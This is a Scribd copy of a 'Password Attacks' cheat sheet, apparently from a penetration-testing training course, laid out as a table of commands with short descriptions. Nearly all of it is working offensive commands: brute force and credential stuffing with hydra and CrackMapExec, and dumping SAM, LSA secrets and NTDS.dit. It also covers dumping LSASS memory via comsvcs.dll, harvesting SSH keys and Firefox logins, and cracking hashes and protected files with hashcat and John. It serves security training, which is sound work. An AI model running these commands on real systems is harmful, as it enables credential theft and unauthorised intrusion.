Scribd
Upload
126 views

Password Attacks Module Cheat Sheet

This document provides a cheat sheet of commands that can be used for password attacks and password cracking. It includes commands for connecting to targets, generating password mutation wordlists, performing remote password attacks over various services, and attacking passwords locally on Windows systems.

Uploaded by

rolandontheropes
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
126 views

Password Attacks Module Cheat Sheet

This document provides a cheat sheet of commands that can be used for password attacks and password cracking. It includes commands for connecting to targets, generating password mutation wordlists, performing remote password attacks over various services, and attacking passwords locally on Windows systems.

Uploaded by

rolandontheropes
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

PASSWORD ATTACKS

CHEAT SHEET
Connecting to Target

Command Description

xfreerdp /v:<ip> /u:htb- CLI-based tool used to connect to a Windows target


student /p:HTB_@cademy_stdnt! using the Remote Desktop Protocol.

evil-winrm -i <ip> -u user -p Uses Evil-WinRM to establish a Powershell session with


password a target.

ssh user@<ip> Uses SSH to connect to a target using a specified user.

smbclient -U user \\\\ Uses smbclient to connect to an SMB share using a


<ip>\\SHARENAME specified user.

python3 smbserver.py - Uses smbserver.py to create a share on a linux-based


smb2support CompData attack host. Can be useful when needing to transfer files
/home/<nameofuser>/Documents/
from a target to an attack host.

Password Mutations

Command Description

cewl https://www.inlanefreight.com -d 4 - Uses cewl to generate a wordlist based on


m 6 --lowercase -w inlane.wordlist keywords present on a website.

hashcat --force password.list -r Uses Hashcat to generate a rule-based


custom.rule --stdout > mut_password.list word list.
Command Description

./username-anarchy -i Users username-anarchy tool in


/path/to/listoffirstandlastnames.txt conjunction with a pre-made list of first and
last names to generate a list of potential
username.

curl -s Uses Linux-based commands curl, awk,


https://fileinfo.com/filetypes/compressed grep and tee to download a list of file
| html2text | awk '{print tolower($1)}' |
grep "\." | tee -a compressed_ext.txt extensions to be used in searching for files
that could contain passwords.

Remote Password Attacks

Command Description

crackmapexec winrm <ip> Uses CrackMapExec over WinRM to attempt to brute force
-u user.list -p user names and passwords specified hosted on a target.
password.list

crackmapexec smb <ip> -u Uses CrackMapExec to enumerate smb shares on a target


"user" -p "password" -- using a specified set of credentials.
shares

hydra -L user.list -P Uses Hydra in conjunction with a user list and password list to
password.list attempt to crack a password over the specified service.
<service>://<ip>

hydra -l username -P Uses Hydra in conjunction with a username and password list
password.list to attempt to crack a password over the specified service.
<service>://<ip>

hydra -L user.list -p Uses Hydra in conjunction with a user list and password to
password attempt to crack a password over the specified service.
<service>://<ip>

hydra -C Uses Hydra in conjunction with a list of credentials to attempt


<user_pass.list> to login to a target over the specified service. This can be
ssh://<IP>
used to attempt a credential stuffing attack.

crackmapexec smb <ip> -- Uses CrackMapExec in conjunction with admin credentials to


local-auth -u <username> dump password hashes stored in SAM, over the network.
-p <password> --sam
Command Description

crackmapexec smb <ip> -- Uses CrackMapExec in conjunction with admin credentials to


local-auth -u <username> dump lsa secrets, over the network. It is possible to get clear-
-p <password> --lsa
text credentials this way.

crackmapexec smb <ip> -u Uses CrackMapExec in conjunction with admin credentials to


<username> -p <password> dump hashes from the ntds file over a network.
--ntds

evil-winrm -i <ip> -u Uses Evil-WinRM to establish a Powershell session with a


Administrator -H " Windows target using a user and password hash. This is one
<passwordhash>"
type of Pass-The-Hash attack.

Windows Local Password Attacks

Command Description

tasklist /svc A command-


line-based utility
in Windows
used to list
running
processes.

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git Uses Windows
*.ps1 *.yml command-line
based utility
findstr to search
for the string
"password" in
many different
file type.
Command Description

Get-Process lsass A Powershell


cmdlet is used
to display
process
information.
Using this with
the LSASS
process can be
helpful when
attempting to
dump LSASS
process
memory from
the command
line.

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 Uses rundll32 in


C:\lsass.dmp full Windows to
create a LSASS
memory dump
file. This file can
then be
transferred to
an attack box to
extract
credentials.

pypykatz lsa minidump /path/to/lsassdumpfile Uses Pypykatz


to parse and
attempt to
extract
credentials &
password
hashes from an
LSASS process
memory dump
file.
Command Description

reg.exe save hklm\sam C:\sam.save Uses reg.exe in


Windows to
save a copy of
a registry hive
at a specified
location on the
file system. It
can be used to
make copies of
any registry
hive (i.e.,
hklm\sam,
hklm\security,
hklm\system).

move sam.save \\<ip>\NameofFileShare Uses move in


Windows to
transfer a file to
a specified file
share over the
network.

python3 secretsdump.py -sam sam.save -security security.save - Uses


system system.save LOCAL Secretsdump.py
to dump
password
hashes from the
SAM database.

vssadmin CREATE SHADOW /For=C: Uses Windows


command line
based tool
vssadmin to
create a volume
shadow copy
for C:. This can
be used to
make a copy of
NTDS.dit safely.
Command Description

cmd.exe /c copy \\? Uses Windows


\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit command line
c:\NTDS\NTDS.dit
based tool copy
to create a copy
of NTDS.dit for
a volume
shadow copy of
C:.

Linux Local Password Attacks

Command Description

for l in $(echo ".conf .config .cnf");do echo -e Script that can be used to find
"\nFile extension: " $l; find / -name *$l .conf, .config and .cnf files on a
2>/dev/null | grep -v "lib|fonts|share|core" ;done
Linux system.

for i in $(find / -name *.cnf 2>/dev/null | grep -v Script that can be used to find
"doc|lib");do echo -e "\nFile: " $i; grep credentials in specified file
"user|password|pass" $i 2>/dev/null | grep -v
"\#";done types.

for l in $(echo ".sql .db .*db .db*");do echo -e Script that can be used to find
"\nDB File extension: " $l; find / -name *$l common database files.
2>/dev/null | grep -v
"doc|lib|headers|share|man";done

find /home/* -type f -name "*.txt" -o ! -name "*.*" Uses Linux-based find
command to search for text
files.

for l in $(echo ".py .pyc .pl .go .jar .c .sh");do Script that can be used to
echo -e "\nFile extension: " $l; find / -name *$l search for common file types
2>/dev/null | grep -v "doc|lib|headers|share";done
used with scripts.

for ext in $(echo ".xls .xls* .xltx .csv .od* .doc Script used to look for common
.doc* .pdf .pot .pot* .pp*");do echo -e "\nFile types of documents.
extension: " $ext; find / -name *$ext 2>/dev/null |
grep -v "lib|fonts|share|core" ;done

cat /etc/crontab Uses Linux-based cat command


to view the contents of crontab
in search for credentials.
Command Description

ls -la /etc/cron.*/ Uses Linux-based ls -la


command to list all files that
start with cron contained in the
etc directory.

grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1" Uses Linux-based command
grep to search the file system
for key terms PRIVATE KEY to
discover SSH keys.

grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep Uses Linux-based grep
":1" command to search for the
keywords PRIVATE KEY within
files contained in a user's home
directory.

grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1" Uses Linux-based grep
command to search for
keywords ssh-rsa within files
contained in a user's home
directory.

tail -n5 /home/*/.bash* Uses Linux-based tail command


to search the through bash
history files and output the last 5
lines.

python3 mimipenguin.py Runs Mimipenguin.py using


python3.

bash mimipenguin.sh Runs Mimipenguin.sh using


bash.

python2.7 lazagne.py all Runs Lazagne.py with all


modules using python2.7

ls -l .mozilla/firefox/ | grep default Uses Linux-based command to


search for credentials stored by
Firefox then searches for the
keyword default using grep.
Command Description

cat .mozilla/firefox/1bplpd86.default- Uses Linux-based command cat


release/logins.json | jq . to search for credentials stored
by Firefox in JSON.

python3.9 firefox_decrypt.py Runs Firefox_decrypt.py to


decrypt any encrypted
credentials stored by Firefox.
Program will run using
python3.9.

python3 lazagne.py browsers Runs Lazagne.py browsers


module using Python 3.

Cracking Passwords

Command Description

hashcat -m 1000 dumpedhashes.txt Uses Hashcat to crack NTLM hashes using a


/usr/share/wordlists/rockyou.txt specified wordlist.

hashcat -m 1000 Uses Hashcat to attempt to crack a single


64f12cddaa88057e06a81b54e73b949b NTLM hash and display the results in the
/usr/share/wordlists/rockyou.txt --
show terminal output.

unshadow /tmp/passwd.bak Uses unshadow to combine data from


/tmp/shadow.bak > passwd.bak and shadow.bk into one single file
/tmp/unshadowed.hashes
to prepare for cracking.

hashcat -m 1800 -a 0 Uses Hashcat in conjunction with a wordlist to


/tmp/unshadowed.hashes rockyou.txt -o crack the unshadowed hashes and outputs the
/tmp/unshadowed.cracked
cracked hashes to a file called
unshadowed.cracked.

hashcat -m 500 -a 0 md5-hashes.list Uses Hashcat in conjunction with a word list to


rockyou.txt crack the md5 hashes in the md5-hashes.list
file.

hashcat -m 22100 backup.hash Uses Hashcat to crack the extracted BitLocker


/opt/useful/seclists/Passwords/Leaked- hashes using a wordlist and outputs the
Databases/rockyou.txt -o
backup.cracked cracked hashes into a file called
backup.cracked.
Command Description

ssh2john.pl SSH.private > ssh.hash Runs Ssh2john.pl script to generate hashes for
the SSH keys in the SSH.private file, then
redirects the hashes to a file called ssh.hash.

john ssh.hash --show Uses John to attempt to crack the hashes in


the ssh.hash file, then outputs the results in
the terminal.

office2john.py Protected.docx > Runs Office2john.py against a protected .docx


protected-docx.hash file and converts it to a hash stored in a file
called protected-docx.hash.

john --wordlist=rockyou.txt protected- Uses John in conjunction with the wordlist


docx.hash rockyou.txt to crack the hash protected-
docx.hash.

pdf2john.pl PDF.pdf > pdf.hash Runs Pdf2john.pl script to convert a pdf file to
a pdf has to be cracked.

john --wordlist=rockyou.txt pdf.hash Runs John in conjunction with a wordlist to


crack a pdf hash.

zip2john ZIP.zip > zip.hash Runs Zip2john against a zip file to generate a
hash, then adds that hash to a file called
zip.hash.

john --wordlist=rockyou.txt zip.hash Uses John in conjunction with a wordlist to


crack the hashes contained in zip.hash.

bitlocker2john -i Backup.vhd > Uses Bitlocker2john script to extract hashes


backup.hashes from a VHD file and directs the output to a file
called backup.hashes.

file GZIP.gzip Uses the Linux-based file tool to gather file


format information.

for i in $(cat rockyou.txt);do openssl Script that runs a for-loop to extract files from
enc -aes-256-cbc -d -in GZIP.gzip -k an archive.
$i 2>/dev/null | tar xz;done

You might also like